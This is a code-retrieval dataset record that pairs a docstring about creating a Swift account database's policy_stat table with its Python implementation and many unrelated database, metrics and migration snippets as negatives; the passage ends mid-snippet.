query
stringlengths
9
3.4k
document
stringlengths
9
87.4k
metadata
dict
negatives
listlengths
4
101
negative_scores
listlengths
4
101
document_score
stringlengths
3
10
document_rank
stringclasses
102 values
Copied from AccountBroker before the container_count column was added. Create policy_stat table which is specific to the account DB. Not a part of Pluggable Backends, internal to the baseline code.
def pre_track_containers_create_policy_stat(self, conn): conn.executescript(""" CREATE TABLE policy_stat ( storage_policy_index INTEGER PRIMARY KEY, object_count INTEGER DEFAULT 0, bytes_used INTEGER DEFAULT 0 ); INSERT OR IGNORE INTO policy_stat ( storage_policy_index, object_count, bytes_used ) SELECT 0, object_count, bytes_used FROM account_stat WHERE container_count > 0; """)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pre_track_containers_create_container_table(self, conn):\n # revert to old trigger script to support one of the tests\n OLD_POLICY_STAT_TRIGGER_SCRIPT = \"\"\"\n CREATE TRIGGER container_insert_ps AFTER INSERT ON container\n BEGIN\n INSERT OR IGNORE INTO policy_stat\n (storage_policy_index, object_count, bytes_used)\n VALUES (new.storage_policy_index, 0, 0);\n UPDATE policy_stat\n SET object_count = object_count + new.object_count,\n bytes_used = bytes_used + new.bytes_used\n WHERE storage_policy_index = new.storage_policy_index;\n END;\n CREATE TRIGGER container_delete_ps AFTER DELETE ON container\n BEGIN\n UPDATE policy_stat\n SET object_count = object_count - old.object_count,\n bytes_used = bytes_used - old.bytes_used\n WHERE storage_policy_index = old.storage_policy_index;\n END;\n\n \"\"\"\n conn.executescript(\"\"\"\n CREATE TABLE container (\n ROWID INTEGER PRIMARY KEY AUTOINCREMENT,\n name TEXT,\n put_timestamp TEXT,\n delete_timestamp TEXT,\n object_count INTEGER,\n bytes_used INTEGER,\n deleted INTEGER DEFAULT 0,\n storage_policy_index INTEGER DEFAULT 0\n );\n\n CREATE INDEX ix_container_deleted_name ON\n container (deleted, name);\n\n CREATE TRIGGER container_insert AFTER INSERT ON container\n BEGIN\n UPDATE account_stat\n SET container_count = container_count + (1 - new.deleted),\n object_count = object_count + new.object_count,\n bytes_used = bytes_used + new.bytes_used,\n hash = chexor(hash, new.name,\n new.put_timestamp || '-' ||\n new.delete_timestamp || '-' ||\n new.object_count || '-' || new.bytes_used);\n END;\n\n CREATE TRIGGER container_update BEFORE UPDATE ON container\n BEGIN\n SELECT RAISE(FAIL, 'UPDATE not allowed; DELETE and INSERT');\n END;\n\n\n CREATE TRIGGER container_delete AFTER DELETE ON container\n BEGIN\n UPDATE account_stat\n SET container_count = container_count - (1 - old.deleted),\n object_count = object_count - old.object_count,\n bytes_used = bytes_used - old.bytes_used,\n hash = chexor(hash, old.name,\n old.put_timestamp || '-' ||\n old.delete_timestamp || '-' ||\n old.object_count || '-' || old.bytes_used);\n END;\n \"\"\" + OLD_POLICY_STAT_TRIGGER_SCRIPT)", "def premetadata_create_account_stat_table(self, conn, put_timestamp):\n conn.executescript('''\n CREATE TABLE account_stat (\n account TEXT,\n created_at TEXT,\n put_timestamp TEXT DEFAULT '0',\n delete_timestamp TEXT DEFAULT '0',\n container_count INTEGER,\n object_count INTEGER DEFAULT 0,\n bytes_used INTEGER DEFAULT 0,\n hash TEXT default '00000000000000000000000000000000',\n id TEXT,\n status TEXT DEFAULT '',\n status_changed_at TEXT DEFAULT '0'\n );\n\n INSERT INTO account_stat (container_count) VALUES (0);\n ''')\n\n conn.execute('''\n UPDATE account_stat SET account = ?, created_at = ?, id = ?,\n put_timestamp = ?\n ''', (self.account, Timestamp.now().internal, str(uuid4()),\n put_timestamp))", "def prespi_AccountBroker_initialize(self, conn, put_timestamp, **kwargs):\n if not self.account:\n raise ValueError(\n 'Attempting to create a new database with no account set')\n self.create_container_table(conn)\n self.create_account_stat_table(conn, put_timestamp)", "def parseToDb(self):\n self.cursor.execute('''DROP TABLE IF EXISTS policy''')\n self.cursor.execute('''CREATE TABLE policy\n (name text, src text, dst text, services text, action INTEGER)''')", "def prespi_create_container_table(self, conn):\n conn.executescript(\"\"\"\n CREATE TABLE container (\n ROWID INTEGER PRIMARY KEY AUTOINCREMENT,\n name TEXT,\n put_timestamp TEXT,\n delete_timestamp TEXT,\n object_count INTEGER,\n bytes_used INTEGER,\n deleted INTEGER DEFAULT 0\n );\n\n CREATE INDEX ix_container_deleted_name ON\n container (deleted, name);\n\n CREATE TRIGGER container_insert AFTER INSERT ON container\n BEGIN\n UPDATE account_stat\n SET container_count = container_count + (1 - new.deleted),\n object_count = object_count + new.object_count,\n bytes_used = bytes_used + new.bytes_used,\n hash = chexor(hash, new.name,\n new.put_timestamp || '-' ||\n new.delete_timestamp || '-' ||\n new.object_count || '-' || new.bytes_used);\n END;\n\n CREATE TRIGGER container_update BEFORE UPDATE ON container\n BEGIN\n SELECT RAISE(FAIL, 'UPDATE not allowed; DELETE and INSERT');\n END;\n\n\n CREATE TRIGGER container_delete AFTER DELETE ON container\n BEGIN\n UPDATE account_stat\n SET container_count = container_count - (1 - old.deleted),\n object_count = object_count - old.object_count,\n bytes_used = bytes_used - old.bytes_used,\n hash = chexor(hash, old.name,\n old.put_timestamp || '-' ||\n old.delete_timestamp || '-' ||\n old.object_count || '-' || old.bytes_used);\n END;\n \"\"\")", "def _create_schema(self): \n q = (\"CREATE TABLE IF NOT EXISTS \" + \\\n \"profiles (username text, body text, epoch numeric)\",)\n for x in q: self.cursor.execute(x)\n self.conn.commit()", "def _update_cardinality(self, c):\n if c.type in STRUCT:\n Log.error(\"not supported\")\n try:\n if c.table == \"meta.columns\":\n with self.meta.columns.locker:\n partitions = jx.sort([g[c.es_column] for g, _ in jx.groupby(self.meta.columns, c.es_column) if g[c.es_column] != None])\n self.meta.columns.update({\n \"set\": {\n \"partitions\": partitions,\n \"count\": len(self.meta.columns),\n \"cardinality\": len(partitions),\n \"last_updated\": Date.now()\n },\n \"where\": {\"eq\": {\"table\": c.table, \"es_column\": c.es_column}}\n })\n return\n if c.table == \"meta.tables\":\n with self.meta.columns.locker:\n partitions = jx.sort([g[c.es_column] for g, _ in jx.groupby(self.meta.tables, c.es_column) if g[c.es_column] != None])\n self.meta.columns.update({\n \"set\": {\n \"partitions\": partitions,\n \"count\": len(self.meta.tables),\n \"cardinality\": len(partitions),\n \"last_updated\": Date.now()\n },\n \"where\": {\"eq\": {\"table\": c.table, \"name\": c.name}}\n })\n return\n\n es_index = c.table.split(\".\")[0]\n result = self.default_es.post(\"/\" + es_index + \"/_search\", data={\n \"aggs\": {c.name: _counting_query(c)},\n \"size\": 0\n })\n r = result.aggregations.values()[0]\n count = result.hits.total\n cardinality = coalesce(r.value, r._nested.value, 0 if r.doc_count==0 else None)\n if cardinality == None:\n Log.error(\"logic error\")\n\n query = Data(size=0)\n if cardinality > 1000 or (count >= 30 and cardinality == count) or (count >= 1000 and cardinality / count > 0.99):\n Log.note(\"{{table}}.{{field}} has {{num}} parts\", table=c.table, field=c.es_column, num=cardinality)\n with self.meta.columns.locker:\n self.meta.columns.update({\n \"set\": {\n \"count\": count,\n \"cardinality\": cardinality,\n \"last_updated\": Date.now()\n },\n \"clear\": [\"partitions\"],\n \"where\": {\"eq\": {\"es_index\": c.es_index, \"es_column\": c.es_column}}\n })\n return\n elif c.type in _elasticsearch.ES_NUMERIC_TYPES and cardinality > 30:\n Log.note(\"{{field}} has {{num}} parts\", field=c.name, num=cardinality)\n with self.meta.columns.locker:\n self.meta.columns.update({\n \"set\": {\n \"count\": count,\n \"cardinality\": cardinality,\n \"last_updated\": Date.now()\n },\n \"clear\": [\"partitions\"],\n \"where\": {\"eq\": {\"es_index\": c.es_index, \"es_column\": c.es_column}}\n })\n return\n elif len(c.nested_path) != 1:\n query.aggs[literal_field(c.name)] = {\n \"nested\": {\"path\": c.nested_path[0]},\n \"aggs\": {\"_nested\": {\"terms\": {\"field\": c.es_column, \"size\": 0}}}\n }\n else:\n query.aggs[literal_field(c.name)] = {\"terms\": {\"field\": c.es_column, \"size\": 0}}\n\n result = self.default_es.post(\"/\" + es_index + \"/_search\", data=query)\n\n aggs = result.aggregations.values()[0]\n if aggs._nested:\n parts = jx.sort(aggs._nested.buckets.key)\n else:\n parts = jx.sort(aggs.buckets.key)\n\n Log.note(\"{{field}} has {{parts}}\", field=c.name, parts=parts)\n with self.meta.columns.locker:\n self.meta.columns.update({\n \"set\": {\n \"count\": count,\n \"cardinality\": cardinality,\n \"partitions\": parts,\n \"last_updated\": Date.now()\n },\n \"where\": {\"eq\": {\"es_index\": c.es_index, \"es_column\": c.es_column}}\n })\n except Exception, e:\n if \"IndexMissingException\" in e and c.table.startswith(TEST_TABLE_PREFIX):\n with self.meta.columns.locker:\n self.meta.columns.update({\n \"set\": {\n \"count\": 0,\n \"cardinality\": 0,\n \"last_updated\": Date.now()\n },\n \"clear\":[\n \"partitions\"\n ],\n \"where\": {\"eq\": {\"es_index\": c.es_index, \"es_column\": c.es_column}}\n })\n else:\n self.meta.columns.update({\n \"set\": {\n \"last_updated\": Date.now()\n },\n \"clear\": [\n \"count\",\n \"cardinality\",\n \"partitions\",\n ],\n \"where\": {\"eq\": {\"table\": c.table, \"es_column\": c.es_column}}\n })\n Log.warning(\"Could not get {{col.table}}.{{col.es_column}} info\", col=c, cause=e)", "def upgrade():\n op.add_column(\n 'share_instances',\n Column('access_rules_status', String(length=255))\n )\n\n connection = op.get_bind()\n share_instances_table = utils.load_table('share_instances', connection)\n instance_access_table = utils.load_table('share_instance_access_map',\n connection)\n\n # NOTE(u_glide): Data migrations shouldn't be performed on live clouds\n # because it will lead to unpredictable behaviour of running operations\n # like migration.\n instances_query = (\n share_instances_table.select()\n .where(share_instances_table.c.status == constants.STATUS_AVAILABLE)\n .where(share_instances_table.c.deleted == 'False')\n )\n\n for instance in connection.execute(instances_query):\n\n access_mappings_query = instance_access_table.select().where(\n instance_access_table.c.share_instance_id == instance['id']\n ).where(instance_access_table.c.deleted == 'False')\n\n status = constants.STATUS_ACTIVE\n\n for access_rule in connection.execute(access_mappings_query):\n\n if (access_rule['state'] == constants.STATUS_DELETING or\n access_rule['state'] not in priorities):\n continue\n\n if priorities[access_rule['state']] > priorities[status]:\n status = access_rule['state']\n\n # pylint: disable=no-value-for-parameter\n op.execute(\n share_instances_table.update().where(\n share_instances_table.c.id == instance['id']\n ).values({'access_rules_status': upgrade_data_mapping[status]})\n )\n\n op.drop_column('share_instance_access_map', 'state')", "def _setup_user_bookmark_count(self):\r\n test_date_1 = datetime(2013, 11, 25)\r\n stat1 = factory.make_user_bookmark_count(username=u'admin',\r\n data=20,\r\n tstamp=test_date_1)\r\n test_date_2 = datetime(2013, 11, 15)\r\n stat2 = factory.make_user_bookmark_count(username=u'admin',\r\n data=30,\r\n tstamp=test_date_2)\r\n test_date_3 = datetime(2013, 12, 28)\r\n stat3 = factory.make_user_bookmark_count(username=u'admin',\r\n data=15,\r\n tstamp=test_date_3)\r\n transaction.commit()\r\n return [stat1, stat2, stat3]", "def __get_metrics_adapted(self, policies):\n percent_min = 1 - policies['percent']\n percent_max = 1 + policies['percent']\n metrics = {'cpu_min':percent_min*policies['cpu'], 'cpu_max':percent_max*policies['cpu'],\n 'memory_min':percent_min*policies['ram'], 'memory_max':percent_max*policies['ram'],\n 'disk_min':percent_min*policies['disk'], 'disk_max':percent_max*policies['disk']}\n return metrics", "def _create(self):\n with self.pdq:\n c=self.pdq.cursor() \n c.execute('CREATE TABLE pdq (item blob,priority int)')\n c.execute('CREATE INDEX priority_index ON pdq (priority)')", "def _create_intermediate_new_tables_structure(self, conn):\n table_names = []\n with conn.cursor() as cursor, CodeProfiler() as cp:\n tblname = self._blacklist_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n imei_norm_with_check_digit TEXT\n ) PARTITION BY RANGE (virt_imei_shard)\n \"\"\").format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._notifications_lists_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n operator_id TEXT NOT NULL,\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n msisdn TEXT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n amnesty_granted BOOLEAN,\n imei_norm_with_check_digit TEXT\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._notifications_lists_new_part_tblname,\n is_unlogged=True)\n\n tblname = self._exceptions_lists_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n operator_id TEXT NOT NULL,\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n is_valid BOOLEAN,\n imei_norm_with_check_digit TEXT,\n is_blacklisted BOOLEAN\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._exceptions_lists_new_part_tblname,\n is_unlogged=True)\n\n tblname = self._blocking_conditions_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n cond_name TEXT NOT NULL,\n reason TEXT NOT NULL\n )\"\"\")\n .format(sql.Identifier(tblname)))\n table_names.append(tblname)\n\n tblname = self._mnc_mcc_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n mcc_mnc_pattern TEXT NOT NULL,\n operator_id TEXT NOT NULL\n )\"\"\")\n .format(sql.Identifier(tblname)))\n table_names.append(tblname)\n\n tblname = self._notifications_imei_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n amnesty_granted BOOLEAN,\n imei_norm_with_check_digit TEXT\n ) PARTITION BY RANGE (virt_imei_shard)\"\"\")\n .format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._notifications_triplets_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n msisdn TEXT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n amnesty_granted BOOLEAN,\n imei_norm_with_check_digit TEXT,\n home_operator TEXT,\n fallback_operators TEXT[]\n ) PARTITION BY RANGE (virt_imei_shard)\"\"\")\n .format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._pairings_imei_imsi_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n is_valid BOOLEAN,\n imei_norm_with_check_digit TEXT,\n home_operator TEXT,\n is_blacklisted BOOLEAN\n ) PARTITION BY RANGE (virt_imei_shard) \"\"\")\n .format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True, fillfactor=45)\n table_names.append(tblname)\n\n self._intermediate_table_names.extend(table_names)\n return -1, cp.duration", "def test_update_hyperflex_cluster_storage_policy(self):\n pass", "def Attributes(self) -> PolicyStatementAttribute:", "def _add_policy(self, policy):\n self.by_name[policy.name.upper()] = policy\n self.by_index[int(policy)] = policy", "def update_policy(self):\n pass", "def initialize_policies(self, policy_collection, options):", "def t_announceDbCount(self, *_):\n try: self.current_count=self.dbh.getRowCount()\n except: self.current_count=0\n \n self.dprint(\"* ratings_count: current count(%s)\" % self.current_count)\n self.pub(\"ratings_count\", self.current_count)", "def curr_policy_time_calc(self):\n for policy in self.policy_list:\n if policy == self.current_policy:\n policy.current_policy_time += 1", "def derive_newrelic_innodb(self):\n # InnoDB Metrics\n vals = self.get_values([\"status/innodb_pages_created\", \"status/innodb_pages_read\",\n \"status/innodb_pages_written\", \"status/innodb_buffer_pool_read_requests\",\n \"status/innodb_buffer_pool_reads\", \"status/innodb_data_fsyncs\",\n \"status/innodb_os_log_fsyncs\"])\n if vals:\n created, read, written, bp_read_requests, bp_reads, data_fsync, log_fsync = vals\n self.update_metric(\"newrelic/innodb_bp_pages_created\", created)\n self.update_metric(\"newrelic/innodb_bp_pages_read\", read)\n self.update_metric(\"newrelic/innodb_bp_pages_written\", written)\n\n hit_ratio = 0.0\n if (bp_read_requests + bp_reads) > 0:\n hit_ratio = (bp_read_requests / (bp_read_requests + bp_reads)) * 100.0\n\n self.update_metric(\"newrelic/pct_innodb_buffer_pool_hit_ratio\", hit_ratio)\n self.update_metric(\"newrelic/innodb_fsyncs_data\", data_fsync)\n self.update_metric(\"newrelic/innodb_fsyncs_os_log\", log_fsync)\n\n # InnoDB Buffer Metrics\n vals = self.get_values([\"status/innodb_buffer_pool_pages_total\", \"status/innodb_buffer_pool_pages_data\",\n \"status/innodb_buffer_pool_pages_misc\", \"status/innodb_buffer_pool_pages_dirty\",\n \"status/innodb_buffer_pool_pages_free\"])\n if vals:\n pages_total, pages_data, pages_misc, pages_dirty, pages_free = vals\n unassigned = pages_total - pages_data - pages_free - pages_misc\n\n self.update_metric(\"newrelic/innodb_buffer_pool_pages_clean\", pages_data - pages_dirty)\n self.update_metric(\"newrelic/innodb_buffer_pool_pages_dirty\", pages_dirty)\n self.update_metric(\"newrelic/innodb_buffer_pool_pages_misc\", pages_misc)\n self.update_metric(\"newrelic/innodb_buffer_pool_pages_free\", pages_free)\n self.update_metric(\"newrelic/innodb_buffer_pool_pages_unassigned\", unassigned)", "def __create_wallets_table(self):\n cmd = \"\"\" CREATE TABLE IF NOT EXISTS %s (\n %s text PRIMARY KEY,\n %s blob,\n %s blob);\"\"\" %(TABLE_WALLETS,\n COL_WALLETS_NAME,\n COL_WALLETS_PUB_KEY,\n COL_WALLETS_PVT_KEY)\n self.__dbcursor.execute(cmd)", "def test_counts(pawprint_default_tracker_db_with_table):\n\n tracker = pawprint_default_tracker_db_with_table\n\n # Add a bunch of events\n query = (\n \"\"\"\n INSERT INTO {} (timestamp, user_id, event) VALUES\n ('2016-01-01 12:30', 'alice', 'logged_in'),\n ('2016-01-01 12:40', 'bob', 'logged_in'),\n ('2016-01-01 16:00', 'charlotte', 'logged_in'),\n ('2016-01-02 00:00', 'dan', 'logged_in'),\n ('2016-01-02 00:00', 'elizabeth', 'logged_in'),\n ('2016-01-05 00:00', 'frank', 'logged_in'),\n ('2016-01-10 00:00', 'gabrielle', 'logged_in'),\n ('2016-01-20 00:00', 'hans', 'logged_in'),\n ('2016-02-01 00:00', 'iris', 'logged_in'),\n ('2016-02-01 00:00', 'james', 'logged_in'),\n ('2016-03-01 00:00', 'kelly', 'logged_in'),\n ('2016-03-01 00:00', 'laura', 'logged_in'),\n ('2016-03-01 00:00', 'mike', 'not_logged_in')\n \"\"\"\n ).format(tracker.table)\n\n pd.io.sql.execute(query, tracker.db)\n\n logins_hourly = tracker.count(event=\"logged_in\", resolution=\"hour\")\n logins_daily = tracker.count(event=\"logged_in\")\n logins_weekly = tracker.count(event=\"logged_in\", resolution=\"week\")\n logins_monthly = tracker.count(event=\"logged_in\", resolution=\"month\")\n logins_weekly_left_range = tracker.count(\n event=\"logged_in\", resolution=\"week\", start=datetime(2016, 2, 1)\n )\n logins_weekly_right_range = tracker.count(\n event=\"logged_in\", resolution=\"week\", end=datetime(2016, 2, 1)\n )\n logins_daily_full_range = tracker.count(\n event=\"logged_in\", start=datetime(2016, 1, 15), end=datetime(2016, 2, 15)\n )\n\n # Hourly\n assert len(logins_hourly) == 8\n assert np.all(logins_hourly[\"count\"].values == [2, 1, 2, 1, 1, 1, 2, 2])\n\n # Daily\n assert len(logins_daily) == 7\n assert np.all(logins_daily[\"count\"].values == [3, 2, 1, 1, 1, 2, 2])\n\n # Weekly\n assert len(logins_weekly) == 5\n assert np.all(logins_weekly[\"count\"].values == [5, 2, 1, 2, 2])\n\n # Others\n assert len(logins_monthly) == 3\n assert len(logins_weekly_left_range) == 2 # weeks start on Monday\n assert len(logins_weekly_right_range) == 4 # and not at the start / end dates provided\n assert len(logins_daily_full_range) == 2", "def test_setup_db_for_use_retention_creation(self):\n\n expected_retention = {\n 'name': 'testRetention',\n 'duration': '1h0m0s',\n 'shardGroupDuration': '1h0m0s',\n 'replicaN': 1,\n 'default': True\n }\n assert expected_retention in self.test_client.get_list_retention_policies(\n )", "def test_create_hyperflex_cluster_storage_policy(self):\n pass", "def PolicyStatement(self) -> PolicyStatement:", "def test_create_cluster_policy(self):\n pass", "def _create_intermediate_delta_tables_structure(self, conn):\n table_names = []\n with conn.cursor() as cursor, CodeProfiler() as cp:\n tblname = self._blacklist_delta_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n LIKE {blacklist_delta_tbl} INCLUDING DEFAULTS\n INCLUDING IDENTITY\n INCLUDING CONSTRAINTS\n INCLUDING STORAGE\n INCLUDING COMMENTS\n ) PARTITION BY RANGE (virt_imei_shard)\n \"\"\").format(sql.Identifier(tblname),\n blacklist_delta_tbl=sql.Identifier(self._blacklist_tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._notifications_lists_delta_tblname\n notifications_delta_tbl = sql.Identifier(self._notifications_lists_tblname)\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n LIKE {notifications_delta_tbl} INCLUDING DEFAULTS\n INCLUDING IDENTITY\n INCLUDING CONSTRAINTS\n INCLUDING STORAGE\n INCLUDING COMMENTS\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname),\n notifications_delta_tbl=notifications_delta_tbl))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._notifications_lists_delta_part_tblname,\n is_unlogged=True)\n\n tblname = self._exceptions_lists_delta_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n LIKE {exceptions_delta_tbl} INCLUDING DEFAULTS\n INCLUDING IDENTITY\n INCLUDING CONSTRAINTS\n INCLUDING STORAGE\n INCLUDING COMMENTS\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname),\n exceptions_delta_tbl=sql.Identifier(self._exceptions_lists_tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._exceptions_lists_delta_part_tblname,\n is_unlogged=True)\n\n self._intermediate_table_names.extend(table_names)\n return -1, cp.duration", "def get_counters(table_id):\n fields = [\"0\"]*BUCKET_NUM\n\n for pos, cntr_list in counter_bucket_dict.items():\n for counter_name in cntr_list:\n full_table_id = COUNTER_TABLE_PREFIX + table_id\n counter_data = self.db.get(self.db.COUNTERS_DB, full_table_id, counter_name)\n if counter_data is None:\n fields[pos] = STATUS_NA\n elif fields[pos] != STATUS_NA:\n fields[pos] = str(int(fields[pos]) + int(counter_data))\n\n cntr = NStats._make(fields)\n return cntr", "def test_create_namespaced_policy(self):\n pass", "def _populate_blocking_conditions_table(self, conn):\n with conn.cursor() as cursor, CodeProfiler() as cp:\n tblname = self._blocking_conditions_new_tblname\n execute_values(cursor,\n sql.SQL(\"\"\"INSERT INTO {0}(cond_name, reason)\n VALUES %s\"\"\").format(sql.Identifier(tblname)).as_string(cursor),\n [(c.label, c.reason) for c in self._blocking_conditions])\n self._add_pk(conn, tblname=tblname, pk_columns=['cond_name'])\n self._analyze_helper(cursor, tblname)\n\n # Need to get table count since execute_values doesn't retain insert count\n num_records = self._get_total_record_count(conn, tblname)\n return num_records, cp.duration", "def get_cnstat(self):\n def get_counters(table_id):\n \"\"\"\n Get the counters from specific table.\n \"\"\"\n fields = [\"0\"]*BUCKET_NUM\n\n for pos, cntr_list in counter_bucket_dict.items():\n for counter_name in cntr_list:\n full_table_id = COUNTER_TABLE_PREFIX + table_id\n counter_data = self.db.get(self.db.COUNTERS_DB, full_table_id, counter_name)\n if counter_data is None:\n fields[pos] = STATUS_NA\n elif fields[pos] != STATUS_NA:\n fields[pos] = str(int(fields[pos]) + int(counter_data))\n\n cntr = NStats._make(fields)\n return cntr\n\n def get_rates(table_id):\n \"\"\"\n Get the rates from specific table.\n \"\"\"\n fields = [\"0\",\"0\",\"0\",\"0\",\"0\",\"0\"]\n for pos, name in enumerate(rates_key_list):\n full_table_id = RATES_TABLE_PREFIX + table_id\n counter_data = self.db.get(self.db.COUNTERS_DB, full_table_id, name)\n if counter_data is None:\n fields[pos] = STATUS_NA\n elif fields[pos] != STATUS_NA:\n fields[pos] = float(counter_data)\n cntr = RateStats._make(fields)\n return cntr\n\n # Get the info from database\n counter_port_name_map = self.db.get_all(self.db.COUNTERS_DB, COUNTERS_PORT_NAME_MAP);\n # Build a dictionary of the stats\n cnstat_dict = OrderedDict()\n cnstat_dict['time'] = datetime.datetime.now()\n ratestat_dict = OrderedDict()\n if counter_port_name_map is None:\n return cnstat_dict, ratestat_dict\n for port in natsorted(counter_port_name_map):\n port_name = port.split(\":\")[0]\n if self.multi_asic.skip_display(constants.PORT_OBJ, port_name):\n continue\n cnstat_dict[port] = get_counters(counter_port_name_map[port])\n ratestat_dict[port] = get_rates(counter_port_name_map[port])\n return cnstat_dict, ratestat_dict", "def mysql_status(self):\n stamp = int(time.time())\n\n # get data\n conn = self.object.connect()\n result = {}\n try:\n with conn.cursor() as cursor:\n for key in REQUIRED_STATUS_FIELDS:\n cursor.execute('SHOW GLOBAL STATUS LIKE \"%s\";' % key)\n row = cursor.fetchone()\n result[row[0]] = row[1]\n except Exception as e:\n exception_name = e.__class__.__name__\n context.log.debug('failed to collect MySQLd metrics due to %s' % exception_name)\n context.log.debug('additional info:', exc_info=True)\n finally:\n conn.close()\n\n # counters\n counted_vars = {}\n for metric, variable_name in METRICS['counters'].items():\n if variable_name in result:\n counted_vars[metric] = int(result[variable_name])\n\n # compound counter\n counted_vars['mysql.global.writes'] = \\\n counted_vars['mysql.global.insert'] + \\\n counted_vars['mysql.global.update'] + \\\n counted_vars['mysql.global.delete']\n\n self.aggregate_counters(counted_vars, stamp=stamp)\n\n # gauges\n tracked_gauges = {}\n for metric, variable_name in METRICS['gauges'].items():\n if variable_name in result:\n tracked_gauges[metric] = {\n self.object.definition_hash: int(result[variable_name])\n }\n\n # compound gauges\n pool_util = 0\n if ('mysql.global.innodb_buffer_pool_pages_total' in tracked_gauges and\n tracked_gauges['mysql.global.innodb_buffer_pool_pages_total'][self.object.definition_hash] > 0):\n pool_util = (\n (tracked_gauges['mysql.global.innodb_buffer_pool_pages_total'][self.object.definition_hash] -\n tracked_gauges['mysql.global.innodb_buffer_pool_pages_free'][self.object.definition_hash]) /\n tracked_gauges['mysql.global.innodb_buffer_pool_pages_total'][self.object.definition_hash] * 100\n )\n tracked_gauges['mysql.global.innodb_buffer_pool_util'] = {\n self.object.definition_hash: pool_util\n }\n\n hit_ratio = 0\n if ('mysql.global.innodb_buffer_pool_read_requests' in tracked_gauges and\n tracked_gauges['mysql.global.innodb_buffer_pool_read_requests'][self.object.definition_hash] > 0):\n hit_ratio = (\n (tracked_gauges['mysql.global.innodb_buffer_pool_read_requests'][self.object.definition_hash] /\n (tracked_gauges['mysql.global.innodb_buffer_pool_read_requests'][self.object.definition_hash] +\n tracked_gauges['mysql.global.innodb_buffer_pool_reads'][self.object.definition_hash])) * 100\n )\n\n tracked_gauges['mysql.global.innodb_buffer_pool.hit_ratio'] = {\n self.object.definition_hash: hit_ratio\n }\n\n self.aggregate_gauges(tracked_gauges, stamp=stamp)\n\n # finalize\n self.increment_counters()\n self.finalize_gauges()", "def test_update_hyperflex_ext_fc_storage_policy(self):\n pass", "def _set_pg_count_storage_parameters(cls, data, nodes):\n osd_num = 0\n osd_nodes = [node for node in nodes\n if 'ceph-osd' in node.all_roles]\n\n for node in osd_nodes:\n for disk in cls.get_node_volumes(node):\n for part in disk.get('volumes', []):\n if part.get('name') == 'ceph' and part.get('size', 0) > 0:\n osd_num += 1\n\n for node in data:\n storage_attrs = node['storage']\n\n pg_counts = get_pool_pg_count(\n osd_num=osd_num,\n pool_sz=int(storage_attrs['osd_pool_size']),\n ceph_version='firefly',\n volumes_ceph=storage_attrs['volumes_ceph'],\n objects_ceph=storage_attrs['objects_ceph'],\n ephemeral_ceph=storage_attrs['ephemeral_ceph'],\n images_ceph=storage_attrs['images_ceph'],\n emulate_pre_7_0=False)\n\n # Log {pool_name: pg_count} mapping\n pg_str = \", \".join(map(\"{0[0]}={0[1]}\".format, pg_counts.items()))\n logger.debug(\"Ceph: PG values {%s}\", pg_str)\n\n storage_attrs['pg_num'] = pg_counts['default_pg_num']\n storage_attrs['per_pool_pg_nums'] = pg_counts", "def _update_volume_stats(self):\n self._ensure_shares_mounted()\n data = {}\n lcfg = self.configuration\n backend_name = self.configuration.safe_get('volume_backend_name')\n data['volume_backend_name'] = backend_name or self.__class__.__name__\n data['vendor_name'] = 'Oracle'\n 